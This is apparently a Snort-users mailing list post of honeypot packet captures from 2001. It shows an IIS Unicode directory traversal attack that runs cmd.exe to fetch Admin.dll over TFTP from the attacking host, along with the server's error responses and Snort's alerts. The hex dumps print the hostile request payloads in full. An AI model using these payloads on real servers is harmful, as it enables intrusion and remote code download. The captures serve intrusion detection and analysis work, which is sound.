100 : 54 46 54 50 32 32 32 0D 0A 30 39 2F 31 38 2F 30   TFTP222..09/18/0
110 : 31 20 20 31 31 3A 30 35 61 20 20 20 20 20 20 20   1  11:05a       
120 : 20 20 20 20 20 20 20 20 20 35 37 2C 33 34 34 20            57,344 
130 : 54 46 54 50 38 34 0D 0A 20 20 20 20 20 20 20 20   TFTP84..        
140 : 20 20 20 20 20 20 20 36 20 46 69 6C 65 28 73 29          6 File(s)
150 : 20 20 20 20 20 20 20 20 32 32 39 2C 33 37 36 20           229,376 
160 : 62 79 74 65 73 0D 0A 20 20 20 20 20 20 20 20 20   bytes..         
170 : 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20                   
180 : 20 32 2C 31 30 30 2C 31 36 39 2C 32 31 36 20 62    2,100,169,216 b
190 : 79 74 65 73 20 66 72 65 65 0D 0A                  ytes free..
----------------------------------------------------------------------------
--
#(2 - 25875) [2001-09-18 10:23:05]  Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
      hlen=5 TOS=0 dlen=40 ID=5563 flags=0 offset=0 TTL=118 chksum=15840
TCP:  port=3922 -> dport: 80  flags=*****R** seq=491792666
      ack=0 off=5 res=0 win=0 urp=0 chksum=43167
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25876) [2001-09-18 10:23:05]  Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
      hlen=5 TOS=0 dlen=44 ID=5819 flags=0 offset=0 TTL=118 chksum=15580
TCP:  port=3995 -> dport: 80  flags=******S* seq=491921308
      ack=0 off=6 res=0 win=8192 urp=0 chksum=31256
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25877) [2001-09-18 10:23:05]  Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
      hlen=5 TOS=0 dlen=44 ID=65034 flags=0 offset=0 TTL=128 chksum=19340
TCP:  port=80 -> dport: 3995  flags=***A**S* seq=637867
      ack=491921309 off=6 res=0 win=8760 urp=0 chksum=48154
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25878) [2001-09-18 10:23:05]  Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
      hlen=5 TOS=0 dlen=40 ID=6331 flags=0 offset=0 TTL=118 chksum=31456
TCP:  port=3922 -> dport: 80  flags=*****R** seq=491792666
      ack=491792666 off=5 res=0 win=0 urp=0 chksum=25141
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25883) [2001-09-18 10:23:05]  Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
      hlen=5 TOS=0 dlen=40 ID=10684 flags=0 offset=0 TTL=119 chksum=10463
TCP:  port=3995 -> dport: 80  flags=***A**** seq=491921309
      ack=637868 off=5 res=0 win=8760 urp=0 chksum=54231
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25884) [2001-09-18 10:23:05]  spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.243.180 -> XX.XX.XX.XX
      hlen=5 TOS=0 dlen=195 ID=10940 flags=0 offset=0 TTL=119 chksum=10052
TCP:  port=3995 -> dport: 80  flags=***AP*** seq=491921309
      ack=637868 off=5 res=0 win=8760 urp=0 chksum=37455
Payload:  length = 139

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65   5c../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 74   m32/cmd.exe?/c+t
030 : 66 74 70 20 2D 69 20 36 35 2E 32 39 2E 32 34 33   ftp -i 65.29.243
040 : 2E 31 38 30 20 47 45 54 20 41 64 6D 69 6E 2E 64   .180 GET Admin.d
050 : 6C 6C 20 63 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20   ll c:\Admin.dll 
060 : 25 32 30 63 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20   %20c:\Admin.dll 
070 : 48 54 54 50 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20   HTTP/1.0..Host: 
080 : 77 77 77 0D 0A 43 6F 6E 6E 6E 65                  www..Connne
----------------------------------------------------------------------------
--
#(2 - 25886) [2001-09-18 10:23:05]  Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
      hlen=5 TOS=0 dlen=395 ID=779 flags=0 offset=0 TTL=128 chksum=17709
TCP:  port=80 -> dport: 3995  flags=***AP*** seq=637868
      ack=491921464 off=5 res=0 win=8605 urp=0 chksum=26262
Payload:  length = 355

000 : 48 54 54 50 2F 31 2E 31 20 35 30 32 20 47 61 74   HTTP/1.1 502 Gat
010 : 65 77 61 79 20 45 72 72 6F 72 0D 0A 53 65 72 76   eway Error..Serv
020 : 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49   er: Microsoft-II
030 : 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65   S/4.0..Date: Tue
040 : 2C 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36   , 18 Sep 2001 16
050 : 3A 30 36 3A 34 36 20 47 4D 54 0D 0A 43 6F 6E 74   :06:46 GMT..Cont
060 : 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 32 31 35 0D   ent-Length: 215.
070 : 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74   .Content-Type: t
080 : 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C 68 65 61   ext/html....<hea
090 : 64 3E 3C 74 69 74 6C 65 3E 45 72 72 6F 72 20 69
d><title>Error i
0a0 : 6E 20 43 47 49 20 41 70 70 6C 69 63 61 74 69 6F   n CGI Applicatio
0b0 : 6E 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61 64 3E
n</title></head>
0c0 : 0A 3C 62 6F 64 79 3E 3C 68 31 3E 43 47 49 20 45
.<body><h1>CGI E
0d0 : 72 72 6F 72 3C 2F 68 31 3E 54 68 65 20 73 70 65   rror</h1>The
spe
0e0 : 63 69 66 69 65 64 20 43 47 49 20 61 70 70 6C 69   cified CGI appli
0f0 : 63 61 74 69 6F 6E 20 6D 69 73 62 65 68 61 76 65   cation misbehave
100 : 64 20 62 79 20 6E 6F 74 20 72 65 74 75 72 6E 69   d by not returni
110 : 6E 67 20 61 20 63 6F 6D 70 6C 65 74 65 20 73 65   ng a complete se
120 : 74 20 6F 66 20 48 54 54 50 20 68 65 61 64 65 72   t of HTTP header
130 : 73 2E 20 20 54 68 65 20 68 65 61 64 65 72 73 20   s.  The headers 
140 : 69 74 20 64 69 64 20 72 65 74 75 72 6E 20 61 72   it did return ar
150 : 65 3A 3C 70 3E 3C 70 3E 3C 70 72 65 3E 3C 2F 70
e:<p><p><pre></p
160 : 72 65 3E                                          re>
----------------------------------------------------------------------------
--
#(2 - 25887) [2001-09-18 10:23:05]  Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
      hlen=5 TOS=0 dlen=40 ID=1035 flags=0 offset=0 TTL=128 chksum=17808
TCP:  port=80 -> dport: 3995  flags=***A***F seq=638223
      ack=491921464 off=5 res=0 win=8605 urp=0 chksum=53875
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25901) [2001-09-18 10:23:06]  Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
      hlen=5 TOS=0 dlen=40 ID=22716 flags=0 offset=0 TTL=118 chksum=64222
TCP:  port=3995 -> dport: 80  flags=*****R** seq=491921464
      ack=0 off=5 res=0 win=0 urp=0 chksum=45366
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25902) [2001-09-18 10:23:06]  Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
      hlen=5 TOS=0 dlen=44 ID=22972 flags=0 offset=0 TTL=118 chksum=63962
TCP:  port=4242 -> dport: 80  flags=******S* seq=491923784
      ack=0 off=6 res=0 win=8192 urp=0 chksum=28533
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25903) [2001-09-18 10:23:06]  Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
      hlen=5 TOS=0 dlen=44 ID=3595 flags=0 offset=0 TTL=128 chksum=15244
TCP:  port=80 -> dport: 4242  flags=***A**S* seq=638788
      ack=491923785 off=6 res=0 win=8760 urp=0 chksum=44510
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25904) [2001-09-18 10:23:06]  Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
      hlen=5 TOS=0 dlen=40 ID=23228 flags=0 offset=0 TTL=118 chksum=14559
TCP:  port=3995 -> dport: 80  flags=*****R** seq=491921464
      ack=491921464 off=5 res=0 win=0 urp=0 chksum=29612
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25916) [2001-09-18 10:23:06]  Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
      hlen=5 TOS=0 dlen=40 ID=32700 flags=0 offset=0 TTL=119 chksum=53982
TCP:  port=4242 -> dport: 80  flags=***A**** seq=491923785
      ack=638789 off=5 res=0 win=8760 urp=0 chksum=50587
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25917) [2001-09-18 10:23:06]  spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.243.180 -> XX.XX.XX.XX
      hlen=5 TOS=0 dlen=195 ID=32956 flags=0 offset=0 TTL=119 chksum=53571
TCP:  port=4242 -> dport: 80  flags=***AP*** seq=491923785
      ack=638789 off=5 res=0 win=8760 urp=0 chksum=33810
Payload:  length = 139

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65   5c../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 74   m32/cmd.exe?/c+t
030 : 66 74 70 20 2D 69 20 36 35 2E 32 39 2E 32 34 33   ftp -i 65.29.243
040 : 2E 31 38 30 20 47 45 54 20 41 64 6D 69 6E 2E 64   .180 GET Admin.d
050 : 6C 6C 20 64 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20   ll d:\Admin.dll 
060 : 25 32 30 64 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20   %20d:\Admin.dll 
070 : 48 54 54 50 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20   HTTP/1.0..Host: 
080 : 77 77 77 0D 0A 43 6F 6E 6E 6E 65                  www..Connne
----------------------------------------------------------------------------
--
#(2 - 25918) [2001-09-18 10:23:06]  Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
      hlen=5 TOS=0 dlen=395 ID=5131 flags=0 offset=0 TTL=128 chksum=13357
TCP:  port=80 -> dport: 4242  flags=***AP*** seq=638789
      ack=491923940 off=5 res=0 win=8605 urp=0 chksum=22617
Payload:  length = 355

000 : 48 54 54 50 2F 31 2E 31 20 35 30 32 20 47 61 74   HTTP/1.1 502 Gat
010 : 65 77 61 79 20 45 72 72 6F 72 0D 0A 53 65 72 76   eway Error..Serv
020 : 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49   er: Microsoft-II
030 : 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65   S/4.0..Date: Tue
040 : 2C 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36   , 18 Sep 2001 16
050 : 3A 30 36 3A 34 37 20 47 4D 54 0D 0A 43 6F 6E 74   :06:47 GMT..Cont
060 : 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 32 31 35 0D   ent-Length: 215.
070 : 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74   .Content-Type: t
080 : 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C 68 65 61   ext/html....<hea
090 : 64 3E 3C 74 69 74 6C 65 3E 45 72 72 6F 72 20 69
d><title>Error i
0a0 : 6E 20 43 47 49 20 41 70 70 6C 69 63 61 74 69 6F   n CGI Applicatio
0b0 : 6E 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61 64 3E
n</title></head>
0c0 : 0A 3C 62 6F 64 79 3E 3C 68 31 3E 43 47 49 20 45
.<body><h1>CGI E
0d0 : 72 72 6F 72 3C 2F 68 31 3E 54 68 65 20 73 70 65   rror</h1>The
spe
0e0 : 63 69 66 69 65 64 20 43 47 49 20 61 70 70 6C 69   cified CGI appli
0f0 : 63 61 74 69 6F 6E 20 6D 69 73 62 65 68 61 76 65   cation misbehave
100 : 64 20 62 79 20 6E 6F 74 20 72 65 74 75 72 6E 69   d by not returni
110 : 6E 67 20 61 20 63 6F 6D 70 6C 65 74 65 20 73 65   ng a complete se
120 : 74 20 6F 66 20 48 54 54 50 20 68 65 61 64 65 72   t of HTTP header
130 : 73 2E 20 20 54 68 65 20 68 65 61 64 65 72 73 20   s.  The headers 
140 : 69 74 20 64 69 64 20 72 65 74 75 72 6E 20 61 72   it did return ar
150 : 65 3A 3C 70 3E 3C 70 3E 3C 70 72 65 3E 3C 2F 70
e:<p><p><pre></p
160 : 72 65 3E                                          re>
----------------------------------------------------------------------------
--
#(2 - 25919) [2001-09-18 10:23:06]  Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
      hlen=5 TOS=0 dlen=40 ID=5387 flags=0 offset=0 TTL=128 chksum=13456
TCP:  port=80 -> dport: 4242  flags=***A***F seq=639144
      ack=491923940 off=5 res=0 win=8605 urp=0 chksum=50231
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25928) [2001-09-18 10:23:06]  Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
      hlen=5 TOS=0 dlen=40 ID=46780 flags=0 offset=0 TTL=118 chksum=40158
TCP:  port=4242 -> dport: 80  flags=*****R** seq=491923940
      ack=0 off=5 res=0 win=0 urp=0 chksum=42643
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25929) [2001-09-18 10:23:06]  Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
      hlen=5 TOS=0 dlen=44 ID=47036 flags=0 offset=0 TTL=118 chksum=39898
TCP:  port=4276 -> dport: 80  flags=******S* seq=491924169
      ack=0 off=6 res=0 win=8192 urp=0 chksum=28114
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25930) [2001-09-18 10:23:06]  Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
      hlen=5 TOS=0 dlen=44 ID=7947 flags=0 offset=0 TTL=128 chksum=10892
TCP:  port=80 -> dport: 4276  flags=***A**S* seq=639539
      ack=491924170 off=6 res=0 win=8760 urp=0 chksum=43340
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25931) [2001-09-18 10:23:06]  Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
      hlen=5 TOS=0 dlen=40 ID=47292 flags=0 offset=0 TTL=118 chksum=56030
TCP:  port=4242 -> dport: 80  flags=*****R** seq=491923940
      ack=491923940 off=5 res=0 win=0 urp=0 chksum=24413
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25932) [2001-09-18 10:23:07]  Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
      hlen=5 TOS=0 dlen=40 ID=57276 flags=0 offset=0 TTL=119 chksum=29406
TCP:  port=4276 -> dport: 80  flags=***A**** seq=491924170
      ack=639540 off=5 res=0 win=8760 urp=0 chksum=49417
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25933) [2001-09-18 10:23:07]  spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.243.180 -> XX.XX.XX.XX
      hlen=5 TOS=0 dlen=195 ID=60604 flags=0 offset=0 TTL=119 chksum=25923
TCP:  port=4276 -> dport: 80  flags=***AP*** seq=491924170
      ack=639540 off=5 res=0 win=8760 urp=0 chksum=32639
Payload:  length = 139

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65   5c../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 74   m32/cmd.exe?/c+t
030 : 66 74 70 20 2D 69 20 36 35 2E 32 39 2E 32 34 33   ftp -i 65.29.243
040 : 2E 31 38 30 20 47 45 54 20 41 64 6D 69 6E 2E 64   .180 GET Admin.d
050 : 6C 6C 20 65 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20   ll e:\Admin.dll 
060 : 25 32 30 65 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20   %20e:\Admin.dll 
070 : 48 54 54 50 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20   HTTP/1.0..Host: 
080 : 77 77 77 0D 0A 43 6F 6E 6E 6E 65                  www..Connne
----------------------------------------------------------------------------
--
#(2 - 25934) [2001-09-18 10:23:07]  Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
      hlen=5 TOS=0 dlen=40 ID=9483 flags=0 offset=0 TTL=128 chksum=9360
TCP:  port=80 -> dport: 4276  flags=***A**** seq=639540
      ack=491924325 off=5 res=0 win=8605 urp=0 chksum=49417
Payload: none
----------------------------------------------------------------------------
--
#(2 - 26077) [2001-09-18 10:24:43]  Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
      hlen=5 TOS=0 dlen=40 ID=50956 flags=0 offset=0 TTL=118 chksum=35982
TCP:  port=4966 -> dport: 80  flags=*****R** seq=502634226
      ack=0 off=5 res=0 win=0 urp=0 chksum=13838
Payload: none
----------------------------------------------------------------------------
--
#(2 - 26078) [2001-09-18 10:24:43]  Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
      hlen=5 TOS=0 dlen=44 ID=51212 flags=0 offset=0 TTL=118 chksum=35722
TCP:  port=5000 -> dport: 80  flags=******S* seq=502634388
      ack=0 off=6 res=0 win=8192 urp=0 chksum=64911
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 26079) [2001-09-18 10:24:43]  Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
      hlen=5 TOS=0 dlen=44 ID=56846 flags=0 offset=0 TTL=128 chksum=27528
TCP:  port=80 -> dport: 5000  flags=***A**S* seq=736589
      ack=502634389 off=6 res=0 win=8760 urp=0 chksum=48622
      Options:
       #1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 26080) [2001-09-18 10:24:43]  Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
      hlen=5 TOS=0 dlen=40 ID=51468 flags=0 offset=0 TTL=118 chksum=51854
TCP:  port=4966 -> dport: 80  flags=*****R** seq=502634226
      ack=502634226 off=5 res=0 win=0 urp=0 chksum=33062
Payload: none
----------------------------------------------------------------------------
--
#(2 - 26081) [2001-09-18 10:24:44]  Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
      hlen=5 TOS=0 dlen=40 ID=65292 flags=0 offset=0 TTL=119 chksum=21390
TCP:  port=5000 -> dport: 80  flags=***A**** seq=502634389
      ack=736590 off=5 res=0 win=8760 urp=0 chksum=54699
Payload: none
----------------------------------------------------------------------------
--
#(2 - 26082) [2001-09-18 10:24:44]  spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.243.180 -> XX.XX.XX.XX
      hlen=5 TOS=0 dlen=116 ID=13 flags=0 offset=0 TTL=119 chksum=21058
TCP:  port=5000 -> dport: 80  flags=***AP*** seq=502634389
      ack=736590 off=5 res=0 win=8760 urp=0 chksum=4731
Payload:  length = 74

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   GET /scripts/..%
010 : 32 66 2E 2E 2F 41 64 6D 69 6E 2E 64 6C 6C 20 6C   2f../Admin.dll l
020 : 20 48 54 54 50 2F 31 2E 30 0D 0A 48 6F 73 74 3A    HTTP/1.0..Host:
030 : 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 63 74 69 6F    www..Connnectio
040 : 6E 3A 20 63 6C 6F 73 65 0D 0A                     n: close..
----------------------------------------------------------------------------
--
#(2 - 26083) [2001-09-18 10:24:44]  Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
      hlen=5 TOS=0 dlen=279 ID=57102 flags=0 offset=0 TTL=128 chksum=27037
TCP:  port=80 -> dport: 5000  flags=***AP*** seq=736590
      ack=502634465 off=5 res=0 win=8684 urp=0 chksum=40987
Payload:  length = 239

000 : 48 54 54 50 2F 31 2E 31 20 35 30 30 20 53 65 72   HTTP/1.1 500 Ser
010 : 76 65 72 20 45 72 72 6F 72 0D 0A 53 65 72 76 65   ver Error..Serve
020 : 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49 53   r: Microsoft-IIS
030 : 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65 2C   /4.0..Date: Tue,
040 : 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36 3A    18 Sep 2001 16:
050 : 30 38 3A 32 34 20 47 4D 54 0D 0A 43 6F 6E 74 65   08:24 GMT..Conte
060 : 6E 74 2D 54 79 70 65 3A 20 74 65 78 74 2F 68 74   nt-Type: text/ht
070 : 6D 6C 0D 0A 43 6F 6E 74 65 6E 74 2D 4C 65 6E 67   ml..Content-Leng
080 : 74 68 3A 20 31 30 30 0D 0A 0D 0A 3C 68 74 6D 6C   th: 100....<html
090 : 3E 3C 68 65 61 64 3E 3C 74 69 74 6C 65 3E 45 72
><head><title>Er
0a0 : 72 6F 72 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61
ror</title></hea
0b0 : 64 3E 3C 62 6F 64 79 3E 54 68 65 20 73 70 65 63   d><body>The
spec
0c0 : 69 66 69 65 64 20 6D 6F 64 75 6C 65 20 63 6F 75   ified module cou
0d0 : 6C 64 20 6E 6F 74 20 62 65 20 66 6F 75 6E 64 2E   ld not be found.
0e0 : 20 3C 2F 62 6F 64 79 3E 3C 2F 68 74 6D 6C 3E
</body></html>
----------------------------------------------------------------------------
--
#(2 - 26084) [2001-09-18 10:24:44]  Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
      hlen=5 TOS=0 dlen=40 ID=57358 flags=0 offset=0 TTL=128 chksum=27020
TCP:  port=80 -> dport: 5000  flags=***A***F seq=736829
      ack=502634465 off=5 res=0 win=8684 urp=0 chksum=54459
Payload: none
----------------------------------------------------------------------------
--
#(2 - 26085) [2001-09-18 10:24:44]  Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
      hlen=5 TOS=0 dlen=40 ID=17933 flags=0 offset=0 TTL=118 chksum=3470
TCP:  port=5000 -> dport: 80  flags=*****R** seq=502634465
      ack=1819263436 off=5 res=0 win=0 urp=0 chksum=1729
Payload: none
----------------------------------------------------------------------------
--
#(2 - 26100) [2001-09-18 10:24:47]  Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
      hlen=5 TOS=0 dlen=395 ID=62478 flags=0 offset=0 TTL=128 chksum=21545
TCP:  port=80 -> dport: 4276  flags=***AP*** seq=639540
      ack=491924326 off=5 res=0 win=8605 urp=0 chksum=21445
Payload:  length = 355

000 : 48 54 54 50 2F 31 2E 31 20 35 30 32 20 47 61 74   HTTP/1.1 502 Gat
010 : 65 77 61 79 20 45 72 72 6F 72 0D 0A 53 65 72 76   eway Error..Serv
020 : 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49   er: Microsoft-II
030 : 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65   S/4.0..Date: Tue
040 : 2C 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36   , 18 Sep 2001 16
050 : 3A 30 38 3A 32 38 20 47 4D 54 0D 0A 43 6F 6E 74   :08:28 GMT..Cont
060 : 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 32 31 35 0D   ent-Length: 215.
070 : 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74   .Content-Type: t
080 : 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C 68 65 61   ext/html....<hea
090 : 64 3E 3C 74 69 74 6C 65 3E 45 72 72 6F 72 20 69
d><title>Error i
0a0 : 6E 20 43 47 49 20 41 70 70 6C 69 63 61 74 69 6F   n CGI Applicatio
0b0 : 6E 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61 64 3E
n</title></head>
0c0 : 0A 3C 62 6F 64 79 3E 3C 68 31 3E 43 47 49 20 45
.<body><h1>CGI E
0d0 : 72 72 6F 72 3C 2F 68 31 3E 54 68 65 20 73 70 65   rror</h1>The
spe
0e0 : 63 69 66 69 65 64 20 43 47 49 20 61 70 70 6C 69   cified CGI appli
0f0 : 63 61 74 69 6F 6E 20 6D 69 73 62 65 68 61 76 65   cation misbehave
100 : 64 20 62 79 20 6E 6F 74 20 72 65 74 75 72 6E 69   d by not returni
110 : 6E 67 20 61 20 63 6F 6D 70 6C 65 74 65 20 73 65   ng a complete se
120 : 74 20 6F 66 20 48 54 54 50 20 68 65 61 64 65 72   t of HTTP header
130 : 73 2E 20 20 54 68 65 20 68 65 61 64 65 72 73 20   s.  The headers 
140 : 69 74 20 64 69 64 20 72 65 74 75 72 6E 20 61 72   it did return ar
150 : 65 3A 3C 70 3E 3C 70 3E 3C 70 72 65 3E 3C 2F 70
e:<p><p><pre></p
160 : 72 65 3E                                          re>
----------------------------------------------------------------------------
--
#(2 - 26101) [2001-09-18 10:24:47]  Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
      hlen=5 TOS=0 dlen=40 ID=62734 flags=0 offset=0 TTL=128 chksum=21644
TCP:  port=80 -> dport: 4276  flags=***A***F seq=639895
      ack=491924326 off=5 res=0 win=8605 urp=0 chksum=49060
Payload: none
----------------------------------------------------------------------------
--
#(2 - 26102) [2001-09-18 10:24:47]  Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
      hlen=5 TOS=0 dlen=40 ID=43279 flags=0 offset=0 TTL=118 chksum=43659
TCP:  port=4276 -> dport: 80  flags=*****R** seq=491924326
      ack=502634566 off=5 res=0 win=0 urp=0 chksum=61107
Payload: none
----------------------------------------------------------------------------
--
#(2 - 26103) [2001-09-18 10:24:48]  Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
      hlen=5 TOS=0 dlen=40 ID=44047 flags=0 offset=0 TTL=118 chksum=59275
TCP:  port=4276 -> dport: 80  flags=*****R** seq=491924326
      ack=491924326 off=5 res=0 win=0 urp=0 chksum=23607
Payload: none




More information about the Snort-users mailing list